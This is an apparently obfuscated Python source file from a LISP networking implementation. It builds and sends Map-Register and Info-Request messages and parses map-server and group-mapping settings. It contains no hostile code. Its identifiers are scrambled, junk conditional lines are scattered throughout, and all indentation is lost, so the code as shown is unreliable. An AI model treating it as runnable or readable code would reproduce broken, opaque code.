oOO00O = lisp . lisp_parse_auth_key ( oO0o0Ooooo )
OOO = oOO00O . keys ( ) [ 0 ]
I11IiI = oOO00O [ OOO ]
if 77 - 77: OoO0O00 - i1IIi - OoOO0ooOOoo0O . oOo0O0Ooo
if ( OoO0o == "proxy-reply" ) :
O0ooO0Oo00o = True if oO0o0Ooooo == "yes" else False
if 39 - 39: II111iiii / Oo + o0oo0o / oOo0O0Ooo
if ( OoO0o == "merge-registrations" ) :
ooO0oOOooOo0 = True if oO0o0Ooooo == "yes" else False
if 13 - 13: oooO0oo0oOOOO + O0 + i1I1ii1II1iII % oo / Ooo00oOo00o . oooO0oo0oOOOO
if ( OoO0o == "refresh-registrations" ) :
i1I1ii11i1Iii = True if oO0o0Ooooo == "yes" else False
if 86 - 86: iiiiIi11i * Ooo00oOo00o % i1IIi . o0000oOoOoO0o . i11iIiiIii
if ( OoO0o == "want-map-notify" ) :
I1IiiiiI = True if oO0o0Ooooo == "yes" else False
if 56 - 56: oOoO0oo0OOOo % O0 - oo
if ( OoO0o == "site-id" ) :
o0O = int ( oO0o0Ooooo )
if 100 - 100: o0000oOoOoO0o - O0 % iiiiIi11i * II11iiII + oo
if ( OoO0o == "encryption-key" ) :
ii1iII1II = lisp . lisp_parse_auth_key ( oO0o0Ooooo )
IiII = ii1iII1II . keys ( ) [ 0 ]
ii1iII1II = ii1iII1II [ IiII ]
if 88 - 88: OoooooooOO - ooOO00oOo * O0 * OoooooooOO . OoooooooOO
if 33 - 33: o0oo0o + i1I1ii1II1iII * iiiiIi11i / iIii1I11I1II1 - oo
if 54 - 54: o0oo0o / II11iiII . iiiiIi11i % i1I1ii1II1iII
if 57 - 57: i11iIiiIii . oOoO0oo0OOOo - o0000oOoOoO0o - iiiiIi11i + oOo0O0Ooo
if 63 - 63: oOo0O0Ooo * i1I1ii1II1iII
if 69 - 69: O0 . ooOO00oOo
oO0OOoO0 = None
for i111IiI1I in OOOOoo0Oo :
if ( i111IiI1I == "" ) : continue
oO0OOoO0 = lisp . lisp_ms ( i111IiI1I , None , I111Ii111 , oo0OOo0 , OOO , I11IiI ,
O0ooO0Oo00o , ooO0oOOooOo0 , i1I1ii11i1Iii , I1IiiiiI , o0O , IiII , ii1iII1II )
if 49 - 49: oo - OoOO0ooOOoo0O
for OoOOoOooooOOo in ii111iI1iIi1 :
if ( OoOOoOooooOOo == "" ) : continue
oO0OOoO0 = lisp . lisp_ms ( None , OoOOoOooooOOo , I111Ii111 , oo0OOo0 , OOO , I11IiI ,
O0ooO0Oo00o , ooO0oOOooOo0 , i1I1ii11i1Iii , I1IiiiiI , o0O , IiII , ii1iII1II )
if 87 - 87: oo
if 58 - 58: oOo0O0Ooo % Ooo00oOo00o
if 50 - 50: o0oo0o . Ooo00oOo00o
if 97 - 97: O0 + oOo0O0Ooo
if 89 - 89: Ooo00oOo00o + ooOO00oOo * OoOO0ooOOoo0O * o0000oOoOoO0o
if 37 - 37: OoooooooOO - O0 - Ooo00oOo00o
o0o0O0O00oOOo = ( len ( lisp . lisp_map_servers_list ) == 1 )
if ( o0o0O0O00oOOo ) :
oO0OOoO0 = lisp . lisp_map_servers_list . values ( ) [ 0 ]
oOOoo00O0O = threading . Timer ( 2 , iIIIiIi ,
[ oO0OOoO0 . map_server ] )
oOOoo00O0O . start ( )
else :
if 100 - 100: oo / Ooo00oOo00o % II111iiii % OoO0O00 % II11iiII
if 98 - 98: OoOO0ooOOoo0O % i11iIiiIii % Oo + o0000oOoOoO0o
if 78 - 78: oOoO0oo0OOOo % iiiiIi11i / i1I1ii1II1iII - iIii1I11I1II1
if 69 - 69: o0oo0o
if 11 - 11: oo
if 16 - 16: o0000oOoOoO0o + oooO0oo0oOOOO * O0 % i1IIi . oo
if 67 - 67: OoooooooOO / oo * o0000oOoOoO0o + OoOO0ooOOoo0O
if 65 - 65: OoooooooOO - oOoO0oo0OOOo / Oo / II111iiii / i1IIi
if ( lisp . lisp_nat_traversal ) : return
if ( oO0OOoO0 and len ( lisp . lisp_db_list ) > 0 ) :
o00oo0 ( Oo0o0000o0o0 , None , None , oO0OOoO0 , False )
if 38 - 38: Oo % II111iiii % OoOO0ooOOoo0O / ooOO00oOo + oOo0O0Ooo / i1IIi
if 54 - 54: iIii1I11I1II1 % oOoO0oo0OOOo - II11iiII / iiiiIi11i - ooOO00oOo . OoOO0ooOOoo0O
if 11 - 11: oOoO0oo0OOOo . ooOO00oOo * oooO0oo0oOOOO * OoooooooOO + Oo
if 33 - 33: O0 * Ooo00oOo00o - o0oo0o % o0oo0o
if 18 - 18: o0oo0o / OoO0O00 * o0oo0o + o0oo0o * i11iIiiIii * oOoO0oo0OOOo
if 11 - 11: Oo / oOo0O0Ooo - oooO0oo0oOOOO * OoooooooOO + OoooooooOO . oOo0O0Ooo
if 26 - 26: o0000oOoOoO0o % oOoO0oo0OOOo
if ( len ( lisp . lisp_db_list ) > 0 ) :
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 76 - 76: oooO0oo0oOOOO * i1I1ii1II1iII
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 52 - 52: II11iiII
return
if 19 - 19: oo
if 25 - 25: o0000oOoOoO0o / Oo
if 31 - 31: II11iiII . O0 % oo . Ooo00oOo00o + oooO0oo0oOOOO
if 71 - 71: o0oo0o . II111iiii
if 62 - 62: OoooooooOO . OoOO0ooOOoo0O
if 61 - 61: oOo0O0Ooo - II11iiII - i1IIi
if 25 - 25: O0 * OoOO0ooOOoo0O + oOoO0oo0OOOo . Ooo00oOo00o . Ooo00oOo00o
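# Hedged reading: handler for the "lisp group-mapping" command; builds a
# lisp_group_mapping from the group-prefix, instance-id, sources, and
# optional RLE address, then adds it to the group-mapping list.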
def oOooO ( kv_pairs ) :
Oo0oO = [ ]
IIIIiI11I11 = None
oo00o0 = None
I111Ii111 = "all"
if 4 - 4: o0000oOoOoO0o % iiiiIi11i * ooOO00oOo
for OoO0o in kv_pairs . keys ( ) :
oO0o0Ooooo = kv_pairs [ OoO0o ]
if ( OoO0o == "group-name" ) :
o0O0OOOOoOO0 = oO0o0Ooooo
if 23 - 23: i11iIiiIii
if ( OoO0o == "group-prefix" ) :
if ( IIIIiI11I11 == None ) :
IIIIiI11I11 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 30 - 30: Ooo00oOo00o - i1IIi % II111iiii + OoOO0ooOOoo0O * iIii1I11I1II1
IIIIiI11I11 . store_prefix ( oO0o0Ooooo )
if 81 - 81: oooO0oo0oOOOO % i1IIi . iIii1I11I1II1
if ( OoO0o == "instance-id" ) :
if ( IIIIiI11I11 == None ) :
IIIIiI11I11 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 4 - 4: i11iIiiIii % ooOO00oOo % i1IIi / oooO0oo0oOOOO
IIIIiI11I11 . instance_id = int ( oO0o0Ooooo )
if 6 - 6: i1I1ii1II1iII / oo % II11iiII - oo
if ( OoO0o == "ms-name" ) :
I111Ii111 = oO0o0Ooooo [ 0 ]
if 31 - 31: II11iiII
if ( OoO0o == "address" ) :
for i1OOO0000oO in oO0o0Ooooo :
if ( i1OOO0000oO != "" ) : Oo0oO . append ( i1OOO0000oO )
if 15 - 15: oOo0O0Ooo % oo * OoOO0ooOOoo0O
if 81 - 81: Oo - iIii1I11I1II1 - i1IIi / o0oo0o - O0 * OoOO0ooOOoo0O
if ( OoO0o == "rle-address" ) :
if ( oo00o0 == None ) :
oo00o0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 20 - 20: iiiiIi11i % oooO0oo0oOOOO
oo00o0 . store_address ( oO0o0Ooooo )
if 19 - 19: oOoO0oo0OOOo % oooO0oo0oOOOO + Oo / o0oo0o . Oo
if 12 - 12: i1IIi + i1IIi - oOoO0oo0OOOo * OoO0O00 % OoO0O00 - II111iiii
I1111IIi = lisp . lisp_group_mapping ( o0O0OOOOoOO0 , I111Ii111 , IIIIiI11I11 , Oo0oO ,
oo00o0 )
I1111IIi . add_group ( )
return
if 52 - 52: Oo . i1I1ii1II1iII + o0oo0o
if 38 - 38: i1IIi - II111iiii . o0oo0o
if 58 - 58: oo . i1I1ii1II1iII + oOo0O0Ooo
if 66 - 66: i1I1ii1II1iII / iiiiIi11i * OoooooooOO + OoooooooOO % OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i - i11iIiiIii . o0oo0o * o0000oOoOoO0o % i1I1ii1II1iII + i1IIi
if 71 - 71: Ooo00oOo00o
if 38 - 38: iiiiIi11i % oOo0O0Ooo + oOoO0oo0OOOo . i11iIiiIii
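# Hedged reading: encodes one database-mapping into EID-records (one per
# instance-ID in the EID's iid_list) plus its RLOC-records, appending RTR
# RLOCs (priority 254) when translated RLOCs indicate NAT traversal.
# Returns the encoded bytes and the number of EID-records produced.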
def oo0000ooooO0o ( quiet , db , eid , group , ttl ) :
if 40 - 40: oOoO0oo0OOOo + i1IIi * II11iiII
if 85 - 85: o0000oOoOoO0o * OoO0O00 . O0 - i11iIiiIii
if 18 - 18: o0000oOoOoO0o + oooO0oo0oOOOO - O0
if 53 - 53: i1IIi
if 87 - 87: i11iIiiIii + o0oo0o . oOoO0oo0OOOo * o0oo0o . Oo / oOoO0oo0OOOo
if 76 - 76: O0 + i1IIi . OoO0O00 * oo * o0000oOoOoO0o
if 14 - 14: Ooo00oOo00o % O0 * i1I1ii1II1iII + o0000oOoOoO0o + OoO0O00 * o0000oOoOoO0o
if 3 - 3: oOo0O0Ooo * OoO0O00
oOoO00oo0O = { }
for ooo in db . rloc_set :
if ( ooo . translated_rloc . is_null ( ) ) : continue
if 36 - 36: OoooooooOO . ooOO00oOo
for oO in lisp . lisp_rtr_list :
IIiIi = lisp . lisp_rtr_list [ oO ]
if ( lisp . lisp_register_all_rtrs == False and IIiIi == None ) :
lisp . lprint ( " Exclude unreachable RTR {}" . format ( lisp . red ( oO , False ) ) )
if 91 - 91: oOoO0oo0OOOo * OoO0O00 / oo . O0 + ooOO00oOo + oOo0O0Ooo
continue
if 8 - 8: iiiiIi11i / oOoO0oo0OOOo
if ( IIiIi == None ) : continue
oOoO00oo0O [ oO ] = IIiIi
if 20 - 20: oo
break
if 95 - 95: i1I1ii1II1iII - oo
if 34 - 34: Oo * oo . i1IIi * Oo / Oo
IIiI1Ii = 0
O0O0O0Oo = ""
for OOOOoO00o0O in [ eid . instance_id ] + eid . iid_list :
I1I1I1IIi1III = lisp . lisp_eid_record ( )
if 5 - 5: OoO0O00 % Oo % i11iIiiIii + Ooo00oOo00o / oOoO0oo0OOOo - oOoO0oo0OOOo
I1I1I1IIi1III . rloc_count = len ( db . rloc_set ) + len ( oOoO00oo0O )
I1I1I1IIi1III . authoritative = True
I1I1I1IIi1III . record_ttl = ttl
I1I1I1IIi1III . eid . copy_address ( eid )
I1I1I1IIi1III . eid . instance_id = OOOOoO00o0O
I1I1I1IIi1III . eid . iid_list = [ ]
I1I1I1IIi1III . group . copy_address ( group )
if 45 - 45: oOoO0oo0OOOo % oo - i11iIiiIii
O0O0O0Oo += I1I1I1IIi1III . encode ( )
if ( not quiet ) :
ii1iiIiIII1ii = lisp . lisp_print_eid_tuple ( eid , group )
oO0o0oooO0oO = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
oO0o0oooO0oO = lisp . lisp_get_decent_index ( eid )
oO0o0oooO0oO = lisp . bold ( str ( oO0o0oooO0oO ) , False )
oO0o0oooO0oO = ", decent-index {}" . format ( oO0o0oooO0oO )
if 19 - 19: i11iIiiIii + OoooooooOO - OoO0O00 - OoOO0ooOOoo0O
lisp . lprint ( " EID-prefix {} for ms-name '{}'{}" . format ( lisp . green ( ii1iiIiIII1ii , False ) , db . use_ms_name , oO0o0oooO0oO ) )
if 21 - 21: O0 % oooO0oo0oOOOO . oo / II111iiii + oooO0oo0oOOOO
I1I1I1IIi1III . print_record ( " " , False )
if 53 - 53: iiiiIi11i - oo - iiiiIi11i * i1I1ii1II1iII
if 71 - 71: O0 - iIii1I11I1II1
for ooo in db . rloc_set :
i1II = lisp . lisp_rloc_record ( )
i1II . store_rloc_entry ( ooo )
i1II . local_bit = ooo . rloc . is_local ( )
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
if ( not quiet ) : i1II . print_record ( " " )
if 14 - 14: iiiiIi11i / iiiiIi11i % Oo
if 56 - 56: oo . O0 + OoO0O00
if 1 - 1: i1I1ii1II1iII
if 97 - 97: II11iiII + i1I1ii1II1iII + O0 + i11iIiiIii
if 77 - 77: Ooo00oOo00o / OoooooooOO
if 46 - 46: Ooo00oOo00o % iIii1I11I1II1 . i1I1ii1II1iII % i1I1ii1II1iII + i11iIiiIii
for IIiIi in oOoO00oo0O . values ( ) :
i1II = lisp . lisp_rloc_record ( )
i1II . rloc . copy_address ( IIiIi )
i1II . priority = 254
i1II . rloc_name = "RTR"
i1II . weight = 0
i1II . mpriority = 255
i1II . mweight = 0
i1II . local_bit = False
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
if ( not quiet ) : i1II . print_record ( " RTR " )
if 72 - 72: iIii1I11I1II1 * o0000oOoOoO0o % Oo / ooOO00oOo
if 35 - 35: Oo + i1IIi % oOoO0oo0OOOo % OoOO0ooOOoo0O + iiiiIi11i
if 17 - 17: i1IIi
if 21 - 21: OoO0O00
if 29 - 29: OoOO0ooOOoo0O / II111iiii / Oo * II11iiII
IIiI1Ii += 1
if 10 - 10: o0oo0o % oooO0oo0oOOOO * oooO0oo0oOOOO . OoOO0ooOOoo0O / o0000oOoOoO0o % II11iiII
return ( O0O0O0Oo , IIiI1Ii )
if 49 - 49: ooOO00oOo / iiiiIi11i + O0 * Ooo00oOo00o
if 28 - 28: Oo + i11iIiiIii / OoOO0ooOOoo0O % oOo0O0Ooo % OoO0O00 - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: oOoO0oo0OOOo - oo + II11iiII
if 5 - 5: o0000oOoOoO0o
if 46 - 46: oooO0oo0oOOOO
if 45 - 45: Oo
if 21 - 21: iiiiIi11i . o0oo0o . II11iiII / OoO0O00 / o0oo0o
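# Hedged reading: builds and sends Map-Register messages. Database-mappings
# are grouped per map-server name (or per LISP-Decent DNS suffix), packed
# into batches of at most 20 EID-records, and each batch is encoded with the
# map-server's auth/encryption parameters and handed to
# lisp.lisp_send_map_register().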
def o00oo0 ( lisp_sockets , ttl , eid_only , ms_only , refresh ) :
if 17 - 17: II11iiII / II11iiII / OoOO0ooOOoo0O
if 1 - 1: i1IIi . i11iIiiIii % II11iiII
if 82 - 82: iIii1I11I1II1 + OoO0O00 . iIii1I11I1II1 % oooO0oo0oOOOO / o0000oOoOoO0o . o0000oOoOoO0o
if 14 - 14: Ooo00oOo00o . II11iiII . OoOO0ooOOoo0O + OoooooooOO - II11iiII + oooO0oo0oOOOO
if ( eid_only != None ) :
iII1iiiiIII = 1
else :
iII1iiiiIII = lisp . lisp_db_list_length ( )
if ( iII1iiiiIII == 0 ) : return
if 78 - 78: II11iiII * Ooo00oOo00o / OoOO0ooOOoo0O - O0 / oooO0oo0oOOOO
if 96 - 96: oOo0O0Ooo . Ooo00oOo00o - Oo
lisp . lprint ( "Build Map-Register for {} database-mapping entries" . format ( iII1iiiiIII ) )
if 99 - 99: oooO0oo0oOOOO . OoO0O00 - o0000oOoOoO0o % o0000oOoOoO0o * O0 . II111iiii
if 4 - 4: o0000oOoOoO0o
if 51 - 51: ooOO00oOo - O0 % iiiiIi11i - II111iiii
if 31 - 31: i1I1ii1II1iII / OoO0O00 - i1I1ii1II1iII - II11iiII
if 7 - 7: i1I1ii1II1iII % O0 . oOo0O0Ooo + oo - OoOO0ooOOoo0O
o0o0O00oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 27 - 27: i11iIiiIii % II111iiii % OoOO0ooOOoo0O . O0 - OoO0O00 + oOo0O0Ooo
if 57 - 57: iIii1I11I1II1 / OoOO0ooOOoo0O - i1IIi
if 51 - 51: oooO0oo0oOOOO
if 25 - 25: OoooooooOO + oooO0oo0oOOOO * oOoO0oo0OOOo
OoO0ooO = ( iII1iiiiIII > 12 )
if 51 - 51: i1I1ii1II1iII / Oo * oOo0O0Ooo . i1I1ii1II1iII / oOoO0oo0OOOo / i11iIiiIii
IIIII = { }
if ( o0o0O00oo0 ) :
if 78 - 78: o0000oOoOoO0o * i1IIi
if 1 - 1: oo / oooO0oo0oOOOO * Oo
if 1 - 1: OoOO0ooOOoo0O * Ooo00oOo00o . oOo0O0Ooo / O0
if 100 - 100: o0oo0o . Ooo00oOo00o * OoO0O00 % O0 * O0
if 14 - 14: oOoO0oo0OOOo . Oo + II111iiii / i1I1ii1II1iII / OoOO0ooOOoo0O
for ooo0O in lisp . lisp_db_list :
iII1iii = ooo0O . eid if ooo0O . group . is_null ( ) else ooo0O . group
i11i1iiiII = lisp . lisp_get_decent_dns_name ( iII1iii )
IIIII [ i11i1iiiII ] = [ ]
if 68 - 68: i11iIiiIii * ooOO00oOo
else :
if 46 - 46: oOo0O0Ooo / iIii1I11I1II1 % i1I1ii1II1iII . iIii1I11I1II1 * i1I1ii1II1iII
if 38 - 38: oOoO0oo0OOOo - i1I1ii1II1iII / O0 . o0oo0o
if 45 - 45: o0oo0o
if 83 - 83: oOo0O0Ooo . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / oooO0oo0oOOOO / i11iIiiIii
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and oO0OOoO0 != ms_only ) : continue
IIIII [ oO0OOoO0 . ms_name ] = [ ]
if 62 - 62: ooOO00oOo / oOoO0oo0OOOo
if 7 - 7: OoooooooOO . oooO0oo0oOOOO
if 53 - 53: o0000oOoOoO0o % o0000oOoOoO0o * Ooo00oOo00o + oOo0O0Ooo
if 92 - 92: OoooooooOO + i1IIi / o0000oOoOoO0o * O0
if 100 - 100: Oo % iIii1I11I1II1 * II111iiii - i1I1ii1II1iII
if 92 - 92: Oo
II11iI111i1 = lisp . lisp_map_register ( )
II11iI111i1 . nonce = 0xaabbccdddfdfdf00
II11iI111i1 . xtr_id_present = True
if 95 - 95: OoooooooOO - oooO0oo0oOOOO * oo + oOo0O0Ooo
if ( ttl == None ) : ttl = lisp . LISP_REGISTER_TTL
if 10 - 10: Ooo00oOo00o / i11iIiiIii
if 92 - 92: OoOO0ooOOoo0O . o0oo0o
if 85 - 85: oOoO0oo0OOOo . o0oo0o
if 78 - 78: Oo * o0oo0o + iIii1I11I1II1 + iIii1I11I1II1 / o0oo0o . o0000oOoOoO0o
for ooo0O in lisp . lisp_db_list :
if ( o0o0O00oo0 ) :
O000 = lisp . lisp_get_decent_dns_name ( ooo0O . eid )
else :
O000 = ooo0O . use_ms_name
if 79 - 79: OoooooooOO - oo
if 69 - 69: OoOO0ooOOoo0O
if 95 - 95: Oo + i11iIiiIii * o0oo0o - i1IIi * o0oo0o - iIii1I11I1II1
if 75 - 75: OoooooooOO * oooO0oo0oOOOO
if 9 - 9: oooO0oo0oOOOO - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: oooO0oo0oOOOO * OoO0O00 + iIii1I11I1II1 - oooO0oo0oOOOO + II11iiII
if ( IIIII . has_key ( O000 ) == False ) : continue
if 69 - 69: O0
o0ooO = IIIII [ O000 ]
if ( o0ooO == [ ] ) :
o0ooO = [ "" , 0 ]
IIIII [ O000 ] . append ( o0ooO )
else :
o0ooO = IIIII [ O000 ] [ - 1 ]
if 74 - 74: O0 * iiiiIi11i - i11iIiiIii + o0oo0o
if 17 - 17: iIii1I11I1II1 . OoooooooOO / OoOO0ooOOoo0O % II111iiii % i1IIi / i11iIiiIii
if 58 - 58: OoO0O00 . II111iiii + iiiiIi11i - i11iIiiIii / II111iiii / O0
if 85 - 85: oOo0O0Ooo + II11iiII
if 10 - 10: oooO0oo0oOOOO / ooOO00oOo + oOo0O0Ooo / i1IIi
if 27 - 27: o0000oOoOoO0o
if 67 - 67: oo
if 55 - 55: oOoO0oo0OOOo - i1I1ii1II1iII * Ooo00oOo00o + oOo0O0Ooo * oOo0O0Ooo * O0
if 91 - 91: o0oo0o - II11iiII % iIii1I11I1II1 - OoooooooOO % Oo
if 98 - 98: ooOO00oOo . ooOO00oOo * iiiiIi11i * II111iiii * o0oo0o
O0O0O0Oo = ""
if ( ooo0O . dynamic_eid_configured ( ) ) :
for oOooO0 in ooo0O . dynamic_eids . values ( ) :
iII1iii = oOooO0 . dynamic_eid
if ( eid_only == None or eid_only . is_exact_match ( iII1iii ) ) :
OOOoO000 , IIiI1Ii = oo0000ooooO0o ( OoO0ooO , ooo0O ,
iII1iii , ooo0O . group , ttl )
O0O0O0Oo += OOOoO000
o0ooO [ 1 ] += IIiI1Ii
if 57 - 57: II111iiii
if 54 - 54: OoO0O00 + iiiiIi11i + i11iIiiIii
else :
if ( eid_only == None ) :
O0O0O0Oo , IIiI1Ii = oo0000ooooO0o ( OoO0ooO , ooo0O ,
ooo0O . eid , ooo0O . group , ttl )
o0ooO [ 1 ] += IIiI1Ii
if 28 - 28: iiiiIi11i
if 70 - 70: oooO0oo0oOOOO
if 34 - 34: o0oo0o % oooO0oo0oOOOO
if 3 - 3: II111iiii / II11iiII + oooO0oo0oOOOO . Oo . ooOO00oOo
if 83 - 83: iiiiIi11i + OoooooooOO
if 22 - 22: o0000oOoOoO0o % i1I1ii1II1iII * OoooooooOO - Ooo00oOo00o / iIii1I11I1II1
o0ooO [ 0 ] += O0O0O0Oo
if 86 - 86: OoooooooOO . i1I1ii1II1iII % oOo0O0Ooo / OoOO0ooOOoo0O * i1I1ii1II1iII / Ooo00oOo00o
if ( o0ooO [ 1 ] == 20 ) :
o0ooO = [ "" , 0 ]
IIIII [ O000 ] . append ( o0ooO )
if 64 - 64: i11iIiiIii
if 38 - 38: oooO0oo0oOOOO / oo - oooO0oo0oOOOO . OoOO0ooOOoo0O
if 69 - 69: OoooooooOO + oOoO0oo0OOOo
if 97 - 97: II11iiII - ooOO00oOo / o0000oOoOoO0o . i11iIiiIii % iiiiIi11i * iiiiIi11i
if 1 - 1: oo % Oo
if 65 - 65: oo + oOo0O0Ooo / II11iiII
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and oO0OOoO0 != ms_only ) : continue
if 83 - 83: Ooo00oOo00o . i1I1ii1II1iII - OoO0O00
O000 = oO0OOoO0 . dns_name if o0o0O00oo0 else oO0OOoO0 . ms_name
if ( IIIII . has_key ( O000 ) == False ) : continue
if 65 - 65: iIii1I11I1II1 / Oo . oooO0oo0oOOOO - II111iiii
for o0ooO in IIIII [ O000 ] :
if 72 - 72: iIii1I11I1II1 / oooO0oo0oOOOO % i1I1ii1II1iII % II11iiII - OoOO0ooOOoo0O % II11iiII
if 100 - 100: OoO0O00 + i11iIiiIii
if 71 - 71: OoOO0ooOOoo0O / Ooo00oOo00o / o0oo0o % II11iiII
if 51 - 51: oooO0oo0oOOOO * O0 / II111iiii . o0000oOoOoO0o % II11iiII / oo
II11iI111i1 . record_count = o0ooO [ 1 ]
if ( II11iI111i1 . record_count == 0 ) : continue
if 9 - 9: oo % oo % II111iiii
II11iI111i1 . nonce += 1
II11iI111i1 . alg_id = oO0OOoO0 . alg_id
II11iI111i1 . key_id = oO0OOoO0 . key_id
II11iI111i1 . proxy_reply_requested = oO0OOoO0 . proxy_reply
II11iI111i1 . merge_register_requested = oO0OOoO0 . merge_registrations
II11iI111i1 . map_notify_requested = oO0OOoO0 . want_map_notify
II11iI111i1 . xtr_id = oO0OOoO0 . xtr_id
II11iI111i1 . site_id = oO0OOoO0 . site_id
II11iI111i1 . encrypt_bit = ( oO0OOoO0 . ekey != None )
if ( oO0OOoO0 . refresh_registrations ) :
II11iI111i1 . map_register_refresh = refresh
if 30 - 30: oooO0oo0oOOOO + o0oo0o - oooO0oo0oOOOO . oooO0oo0oOOOO - II111iiii + O0
if ( oO0OOoO0 . ekey != None ) : II11iI111i1 . encryption_key_id = oO0OOoO0 . ekey_id
oOO0 = II11iI111i1 . encode ( )
II11iI111i1 . print_map_register ( )
if 46 - 46: o0000oOoOoO0o % oOo0O0Ooo
if 64 - 64: i11iIiiIii - II111iiii
if 77 - 77: oOo0O0Ooo % o0000oOoOoO0o
if 9 - 9: ooOO00oOo - OoO0O00 * OoooooooOO . OoO0O00
if 2 - 2: OoooooooOO % II11iiII
oOoOOo0oo0 = II11iI111i1 . encode_xtr_id ( "" )
O0O0O0Oo = o0ooO [ 0 ]
oOO0 = oOO0 + O0O0O0Oo + oOoOOo0oo0
if 60 - 60: Oo * o0oo0o + OoO0O00
oO0OOoO0 . map_registers_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , oOO0 , II11iI111i1 , oO0OOoO0 )
time . sleep ( .001 )
if 19 - 19: ooOO00oOo * OoOO0ooOOoo0O / OoOO0ooOOoo0O . OoooooooOO - II11iiII + i11iIiiIii
if 88 - 88: i11iIiiIii - Oo
if 67 - 67: II11iiII . OoO0O00 + oOo0O0Ooo - OoooooooOO
if 70 - 70: II11iiII / II111iiii - iIii1I11I1II1 - i1I1ii1II1iII
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - OoOO0ooOOoo0O
oO0OOoO0 . resolve_dns_name ( )
if 30 - 30: oOo0O0Ooo
if 21 - 21: i11iIiiIii / o0oo0o % II11iiII * O0 . OoOO0ooOOoo0O - iIii1I11I1II1
if 26 - 26: II111iiii * oOo0O0Ooo
if 10 - 10: II111iiii . i1I1ii1II1iII
if 32 - 32: o0000oOoOoO0o . oooO0oo0oOOOO . OoooooooOO - ooOO00oOo + iiiiIi11i
if ( ms_only != None and oO0OOoO0 == ms_only ) : break
if 88 - 88: i1I1ii1II1iII
return
def iIIIiIi ( ms ) :
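# Periodic Info-Request timer handler. It appears to send Info-Requests to
# the map-server(s) on the LISP control port and to each known RTR on the
# data port (skipping private RTR addresses unless LISP_RTR_BEHIND_NAT is
# set), then re-arms itself with a threading.Timer of LISP_INFO_INTERVAL.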
global oOOoo00O0O
global i1111
if 31 - 31: II11iiII / OoO0O00 * i1IIi . oOo0O0Ooo
lisp . lisp_set_exception ( )
if 57 - 57: II11iiII + iIii1I11I1II1 % i1IIi % oo
if 83 - 83: Ooo00oOo00o / i11iIiiIii % iIii1I11I1II1 . OoOO0ooOOoo0O % iiiiIi11i . OoooooooOO
if 94 - 94: o0000oOoOoO0o + iIii1I11I1II1 % ooOO00oOo
if 93 - 93: o0000oOoOoO0o - II11iiII + iIii1I11I1II1 * Ooo00oOo00o + o0oo0o . i1I1ii1II1iII
if 49 - 49: OoooooooOO * OoOO0ooOOoo0O - OoO0O00 . iiiiIi11i
O000o0 = [ i1111 , i1111 , I11 ]
lisp . lisp_build_info_requests ( O000o0 , ms , lisp . LISP_CTRL_PORT )
if 98 - 98: ooOO00oOo . OoOO0ooOOoo0O % II111iiii
if 71 - 71: o0oo0o % i1IIi - II111iiii - II11iiII + II11iiII * Oo
if 51 - 51: iIii1I11I1II1 / oOo0O0Ooo + II11iiII - OoOO0ooOOoo0O + i1I1ii1II1iII
if 29 - 29: Ooo00oOo00o % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / i1I1ii1II1iII
if 70 - 70: i11iIiiIii % i1I1ii1II1iII
I11Ii11iI1 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) == None )
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
if ( IIiIi . is_private_address ( ) and I11Ii11iI1 == False ) :
IiIiiI11111I1 = lisp . red ( IIiIi . print_address_no_iid ( ) , False )
lisp . lprint ( "Skip over RTR private address {}" . format ( IiIiiI11111I1 ) )
continue
if 55 - 55: Oo % OoooooooOO / OoooooooOO % OoooooooOO
lisp . lisp_build_info_requests ( O000o0 , IIiIi , lisp . LISP_DATA_PORT )
oOOoo00O0O . cancel ( )
oOOoo00O0O = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
iIIIiIi , [ None ] )
oOOoo00O0O . start ( )
return
def ooO0o0Oo ( lisp_sockets ) :
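# Periodic Map-Register timer handler. It appears to re-register all
# database-mappings (the refresh call on the first line of the body),
# re-register the broadcast MAC entry when an L2 overlay is configured,
# and then restart the timer.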
global o0oOoO00o
global i1111
if 15 - 15: o0000oOoOoO0o * OoO0O00 % oOoO0oo0OOOo * iIii1I11I1II1 - i11iIiiIii
lisp . lisp_set_exception ( )
if 60 - 60: oo * o0oo0o % ooOO00oOo + iiiiIi11i
if 52 - 52: i1IIi
if 84 - 84: o0000oOoOoO0o / oooO0oo0oOOOO
if 86 - 86: oOo0O0Ooo * II111iiii - O0 . oOo0O0Ooo % iIii1I11I1II1 / II11iiII
o00oo0 ( lisp_sockets , None , None , None , True )
if 11 - 11: oo * iiiiIi11i + oOoO0oo0OOOo / oOoO0oo0OOOo
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: i1I1ii1II1iII + OoOO0ooOOoo0O . oOo0O0Ooo * oo + oOoO0oo0OOOo
if 18 - 18: oooO0oo0oOOOO * Ooo00oOo00o . oooO0oo0oOOOO / O0
if 8 - 8: Ooo00oOo00o
if ( lisp . lisp_l2_overlay ) :
II1II1 = [ None , "ffff-ffff-ffff" , True ]
Ii11iI ( lisp_sockets , [ II1II1 ] )
if 52 - 52: II11iiII - i1I1ii1II1iII * iiiiIi11i
if 17 - 17: OoooooooOO + II11iiII * OoOO0ooOOoo0O * oOo0O0Ooo
if 36 - 36: O0 + OoO0O00
if 5 - 5: OoO0O00 * oOo0O0Ooo
if 46 - 46: Oo
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
